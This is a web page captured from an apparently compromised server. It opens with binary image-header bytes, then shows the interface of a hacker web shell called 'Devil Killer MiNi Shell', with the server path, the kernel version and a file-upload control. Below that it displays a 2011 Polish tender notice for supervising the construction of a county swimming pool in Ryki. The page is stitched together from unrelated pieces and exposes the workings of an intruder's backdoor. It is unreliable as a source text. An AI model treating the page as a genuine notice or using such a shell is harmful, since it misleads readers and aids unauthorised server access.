JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110211/50897-N-2011.html

<p class="kh_header"><b>Ryki: Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacja
inwestycji pn.: Budowa pływalni powiatowej w Rykach</b><br>
<b>Numer ogłoszenia: 50897 - 2011; data zamieszczenia: 11.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Rycki , ul. Wyczółkowskiego 10A, 08-500 Ryki, woj. lubelskie, tel. 081 8657450, 8657472, faks 081 8651966.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiatryki.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacja
inwestycji pn.: Budowa pływalni powiatowej w Rykach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego nad budową na terenie działek nr 4073/3 i 4073/4 w Rykach przy ulicy Janiszewskiej krytej pływalni powiatowej wraz z zagospodarowaniem terenu i niezbędną infrastrukturą techniczną.
2.Obowiązki i prawa inspektora nadzoru wynikają z art. 25-26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity: Dz. U. z 2006 r. Nr 156, poz. 118 ze zm.). w szczególności do obowiązków inspektora nadzoru należeć będzie:
1.osobisty pobyt na terenie realizowanego zadania oraz bieżące reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z przepisami prawa, postanowieniami umowy, projektem oraz zasadami wiedzy technicznej i warunkami określonymi w decyzji o pozwoleniu na budowę,
2.uczestnictwo w przekazaniu wykonawcy terenu budowy,
3.udzielanie wykonawcy robót wszelkich dostępnych informacji i wyjaśnień dotyczących inwestycji,
4.udzielanie wykonawcom na etapie przeprowadzania postępowania przetargowego na roboty budowlane informacji i wyjaśnień za pośrednictwem zamawiającego,
5.kontrolowanie przestrzegania przez Wykonawcę robót zasad bezpieczeństwa pracy i utrzymania porządku na budowie,
6.dokonywanie sprawdzenia dokumentacji technicznej, a w razie potrzeby  wnioskowanie do zamawiającego o dokonanie w niej uzupełnień lub zmian  z zachowaniem zasady niewykraczania poza określenie przedmiotu zamówienia zawarte w siwz oraz informowania o sporządzeniu dokumentacji technicznej niezgodnie z obowiązującymi przepisami,
7.nadzorowanie prac budowlanych, których wykonanie określa dokumentacja projektowa,
8.kontrolowanie jakości wykonywanych robót, wbudowanych materiałów i ich zgodności z obowiązującymi normami, przepisami, specyfikacją techniczną i dokumentacją projektową,
9.wnioskowanie o wykonanie niezbędnych badań technicznych i ekspertyz,
10.zatwierdzanie materiałów budowlanych i instalacyjnych, urządzeń przewidzianych przez wykonawcę do wbudowania, sprawdzenie ich jakości i zapobieganie stosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,
11.nadzorowanie przeprowadzonych prób i rozruchów technicznych i technologicznych w obiekcie,
12.nadzorowanie procesu technologicznego uzdatniania wody basenowej w trakcie próbnej eksploatacji w zakresie urządzeń pomiarowych i dozujących,
13.weryfikacja i zatwierdzanie opracowanych przez wykonawcę robót instrukcji eksploatacji
14.wydawanie poleceń kierownikowi budowy  lub kierownikowi robót potwierdzonych wpisem do dziennika budowy dotyczących usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych,
15.kontrola sposobu składowania i przechowywania materiałów,
16.wnioskowanie do Zamawiającego o usuniecie z terenu budowy każdej osoby zatrudnionej przez wykonawcę robót, która zachowuje się niewłaściwie lub jest niekompetentna lub niedbała w swojej pracy,
17.żądanie od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót i określenia terminu ich wykonania, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę i niezwłoczne pisemne powiadomienie Zamawiającego o tym fakcie,
18.wstrzymanie robót w przypadku, gdy Wykonawca nie wypełnia swoich obowiązku z należytą starannością, wiedzą techniczną i postanowieniami zawartej z nim umowy, w tym zlecenie usunięcia robót niewłaściwych,
19.rozstrzyganie - w uzgodnieniu z Zamawiającym spraw technicznych powstałych w toku wykonywania robót,
20.na każde wezwanie zamawiającego przedkładanie pisemnych ocen jakości i tempa wykonanych prac oraz pisemnych obmiarów wykonanych prac i pisemnych ocen wyników badań dostarczonych przez wykonawcę robót lub zleconych przez zamawiającego,
21.sporządzanie protokołów konieczności w przypadku potrzeby wykonywania robót dodatkowych lub zamiennych, uzasadniania potrzeby wykonywania tych prac oraz wnioskowania do Zamawiającego o ich wykonanie,
22.sprawdzanie i odbioru wykonania robót ulegających zakryciu lub zanikowych,
23.sprawdzanie obmiaru wykonanych robót sporządzonego przez wykonawcę robót budowlanych (w przypadku zaistnienia takiej konieczności)
24.sprawdzanie wykonanych robót i powiadomienie wykonawcy robót o wykrytych wadach oraz określenie zakresu koniecznych do wykonania robót poprawkowych,
25.poświadczanie usunięcia przez wykonawcę robót stwierdzonych wad,
26.informowanie Zamawiającego na bieżąco o postępach w realizacji robót, stwierdzonych nieprawidłowościach lub zagrożeniach w realizacji robót, a także wszelkich okolicznościach, które mogą mieć wpływ na wydłużenie terminu wykonania robót,
27.zatwierdzanie rysunków wykonawczych sporządzanych przez wykonawcę robót budowlanych,
28.zatwierdzanie rysunków powykonawczych sporządzanych przez Wykonawcę robót budowlanych poprzez złożenie na każdym dokumencie, opisie i rysunku powykonawczym stosownych zapisów,
29.potwierdzanie faktycznie wykonanych robót, stwierdzenie zgodności wykonanych robót zarówno pod względem ilościowym jak i jakościowym z dokumentacją techniczną, umową i sst,
30.kompletowanie dokumentacji związanej z odbiorem częściowym i końcowym,
31.potwierdzanie gotowości do odbioru robót,
32.dostarczenie operatu kolaudacyjnego,
33.uczestniczenie w czynnościach odbioru częściowego i końcowego robót i przekazania ich do użytku,
34.zweryfikowanie i zatwierdzenie kompletnej dokumentacji powykonawczej, a następnie dostarczenie jej do Zamawiającego wraz z dokumentacją związaną z nadzorowaną budową,
35.rozliczenie umowy o roboty budowlane w przypadku jej rozliczenia,
36.uczestnictwo w kontrolach robót przeprowadzanych przez organy nadzoru budowlanego,
37.udział w rozwiązywaniu skarg i roszczeń osób trzecich wywołanych realizacją inwestycji,
38.wnioskowanie do zamawiającego o przywołanie nadzoru autorskiego,
39.uczestniczenie w przeglądach w okresie gwarancji, kontrolowanie usuwania ujawnionych wad i usterek oraz udział w odbiorach pousterkowych i gwarancyjnym,
40.współpraca z autorami projektu w zakresie niezbędnym do realizacji zadania.
3.Przedmiot inwestycji zlokalizowany jest w południowo - wschodniej części miasta, na terenie położonym pomiędzy ulicą Lubelską (droga krajowa nr 17 Lublin - Warszawa) a stawem Buksa, po południowej stronie ulicy Janiszewskiej. Po rozebraniu istniejących obiektów budowlanych niedokończonego ośrodka wypoczynkowego, po uzbrojeniu terenu oraz wybudowaniu budynku pływalni przewidziano do wykonania 2654,8 m2 nawierzchni utwardzonych (drogi dojazdowe, place, chodniki, miejsca postojowe) oraz 6559,5 m2 terenów zieleni wraz z elementami małej architektury. Na przedmiotowych działkach zaprojektowano budynek wielozadaniowej krytej pływalni, przeznaczonej do całorocznego użytkowania, o kubaturze 15080 m3, składający się z:
1) hali basenów, w której projektuje się:
 basen pływacki 25x12,5m;
 basen do nauki pływania z częścią rekreacyjną,
 zjeżdżalnię rurową o długości ok. 90m z lądowiskiem,
 brodzik dla dzieci,
 dwie wanny z hydromasażem,
Na antresoli zaprojektowano niewielką widownię, dostępną dla osób nie korzystających z hali basenów. Na widowni przewidziano 38 miejsc siedzących.
2) zespołu pomieszczeń pomocniczych:
 szatnie, natryski, toalety dla użytkowników pływalni,
 recepcja i pomieszczenia personelu,
 pomieszczenia techniczne,
 pomieszczenia komunikacyjne.
Obiekt został zaprojektowany jako dwukondygnacyjny z antresolą wewnętrzną, w całości niepodpiwniczony. Głowna konstrukcja budynku żelbetowa monolityczna, przykrycie hali i daszki w konstrukcji drewnianej. Konstrukcja basenów żelbetowa monolityczna. Posadowienie budynku bezpośrednie w postaci zespołu zmonolityzowanych płyt żelbetowych. Część budynku zawierająca kotłownię to budynek jednokondygnacyjny, w rzucie prostokątny, zdylatowany od budynku pływalni. Stropodach żelbetowy. Posadowienie budynku kotłowni w postaci ław fundamentowych.
Realizacja w/w obiektu będzie wymagała przebudowy istniejących i budowy nowych przyłączy i instalacji zewnętrznych i wewnętrznych wg projektów wykonawczych.

4.Szczegółowy zakres robót opisuje projekt wykonawczy oraz specyfikacje techniczne wykonania i odbioru robót budowlanych, z którymi można zapoznać się w siedzibie zamawiającego.
5.Nadzór należy pełnić zgodnie z ustawą Prawo budowlane, obowiązującymi przepisami, polskimi normami i zasadami wiedzy technicznej. 
6.Zaleca się, aby Wykonawca zdobył wszelkie informacje (np. dokonał wizji lokalnej na terenie budowy, zapoznał się z dokumentacją projektową), które mogą być niezbędne do przygotowania oferty oraz podpisania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.
	Zamawiający przewiduje udzielenie zamówienia uzupełniającego, stanowiącego nie więcej niż 50 % wartości zamówienia podstawowego. Zamówienie uzupełniające polegać  będzie na powtórzeniu tego samego rodzaju zamówienia określonego w SIWZ.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości: 3.000,00 zł (słownie: trzy tysiące złotych) przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 usługę o wartości co najmniej 160.000,00 zł polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego nad zadaniem polegającym na budowie krytej pływalni o powierzchni użytkowej min.1 000 m2 i powierzchni lustra wody min. 300 m2.Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać:
1.dysponowanie osobą do pełnienia funkcji inspektora nadzoru inwestorskiego posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń wydane zgodnie z odnośnymi przepisami (w Polsce: ustawą z dnia 7 lipca 1994 r. Prawo budowlane z późn. zm.) i należącą do organu samorządu zawodowego; osoba ta powinna się wykazać doświadczeniem  w pełnieniu funkcji inspektora nadzoru związanych z realizacją co najmniej jednej inwestycji obejmującej budowę krytej pływalni o powierzchni użytkowej min.1 000 m2 i powierzchni lustra wody min. 300 m2.
2.dysponowanie osobą do pełnienia funkcji inspektora nadzoru inwestorskiego posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, wydane zgodnie z odnośnymi przepisami (w Polsce: ustawą z dnia 7 lipca 1994 r. Prawo budowlane z późn. zm.) i należącą do organu samorządu zawodowego;
3.dysponowanie osobą do pełnienia funkcji inspektora nadzoru inwestorskiego posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, wydane zgodnie z odnośnymi przepisami (w Polsce: ustawą z dnia 7 lipca 1994 r. Prawo budowlane z późn. zm.) i należącą do organu samorządu zawodowego;
4.dysponowanie osobą do pełnienia funkcji inspektora nadzoru inwestorskiego posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej, wydane zgodnie z odnośnymi przepisami (w Polsce: ustawą z dnia 7 lipca 1994 r. Prawo budowlane z późn. zm.) i należącą do organu samorządu zawodowego;
5.dysponowanie osobą do pełnienia funkcji inspektora nadzoru inwestorskiego posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności telekomunikacyjnej bez ograniczeń wydane zgodnie z odnośnymi przepisami (w Polsce: ustawą z dnia 7 lipca 1994 r. Prawo budowlane z późn. zm.) i należącą do organu samorządu zawodowego;
Zamawiający dopuszcza łączenie przez jedną osobę dwóch lub więcej funkcji wskazanych w punktach 1-5. Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawca winien wykazać fakt ubezpieczenia od odpowiedzialności cywilnej w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 100.000,00 zł na wszystkie zdarzenia.1.Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany istotnych postanowień  zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy polegające na: 
1)zmianie dotyczącej zakresu robót i wynagrodzenia spowodowanej wystąpieniem siły wyższej, czyli zdarzenia, którego strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia wykonawcy wykonanie w części lub całości jego zobowiązań, Zamawiający zapłaci wynagrodzenie za wykonaną pracę;
2)zmianie osobowej: zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ (w tym przypadku wykonawca zobowiązany jest dostarczyć zamawiającemu dokumenty potwierdzające spełnianie tych warunków) lub zmiana - za zgodą Zamawiającego, podwykonawców nie wskazanych w ofercie (lub zakresu wskazanego w ofercie jako planowany do powierzenia podwykonawcom); zmiana taka nie wymaga aneksu do umowy i może być przeprowadzona przy zachowaniu procedury zatwierdzenia podwykonawców wynikającej z przepisów prawa i SIWZ;
3)zmianie warunków płatności na rzecz Wykonawcy na skutek  zmian zawartej przez Zmawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Zarządzającej dotyczących realizacji projektu.</p>
